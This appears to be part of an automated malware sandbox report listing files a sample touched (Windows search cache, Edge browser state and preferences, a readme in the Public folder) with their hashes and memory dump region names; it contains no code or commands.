MD5 d60f8cd0b7974f1debadde3a8351ac9b
SHA1 48dbf91954e109d51007e69b7f1c79311115917d
SHA256 8b5a809172aa21cab40b8c4eb25af0eb02ef2d865fcf6aaba9e46b97f589a6c3
SHA512 77f3690028a26aca4399f3d04428c9d4ecb69660d14eca3adb443ba33b5f6280630c49bcbfc39bd7ca7c5537106af368147d661dfb0b2a8a44c054ad9fc36ae1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133778691422624591.txt

MD5 93ebc3ec5cf840b4509282e9d7ff10d4
SHA1 439a1063756dc26ef3330bac9d1897cb38c42fd6
SHA256 e8a625d967458734d9c5e03ca15cb52bc6e7ae828d4383821eb5583e0e8b06b4
SHA512 5f92e79500ed4cec65827c1f4d8ebd9ecf0bb5ed151c2c71309edfe8b09e8be7515fa6cfa34252e20e90aac76dd6d4521eacfcabfab9d4773fa553fd30109535

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

MD5 a39ce4b6fc5e33aa77f0d2a1a0a2962e
SHA1 c596884998bd6cdd8c60c240b1dbe05258dc2e4f
SHA256 261f067d9c2a8e99ea7e320b359a6df4882df4e253e419197c89a28474d18161
SHA512 e83ec508e31a1669a6bd49c8ae51a27925f3a4fb68ed4791adcecc2f6c766751307c94c8c601f942459c760a90e29f2e6a37b1e1106d2fdd0bf3e981d05e38bf

memory/3740-342-0x0000025C5A200000-0x0000025C5A208000-memory.dmp

memory/3740-343-0x0000025C5A170000-0x0000025C5A171000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d2e5e32a1d17ded5016384b9ad867305
SHA1 f8966c5225458996db4220aeedb4da819bdce46e
SHA256 f737e5e435f222b126cf9e38421e40626f7a397bde994c4f26763e3cc388a5df
SHA512 313959e6b0db24833253f2c5375c4163cd7d689b2818d09f368311a55b9d32f6cf1b612dea5aaafe9a8db096ab0ac9c79eb1b6114ccee17310e5e9f44194336f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 81b40971034dadfe5be7f6975a07ec89
SHA1 9780b8b91043a6e33538c694c0aacaf731371d8f
SHA256 b1a54f40dc5a1cfd9504e5e3cece5d4a8fe33b44f82a7c311e272bb89b1e0a92
SHA512 b2d1146fb479e1c6c644677892a1e44d5a805d9205f1aa756548be457cf7795a9b6d0a8a72bcaafee299c26ef2fd237245a5b38d86cc8f143dfd39496436043f

C:\Users\Public\readme.txt

MD5 718777534403cdcf89b5d9b5f4b2f141
SHA1 3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29
SHA256 619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb
SHA512 8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

memory/3740-476-0x0000025C5A260000-0x0000025C5A268000-memory.dmp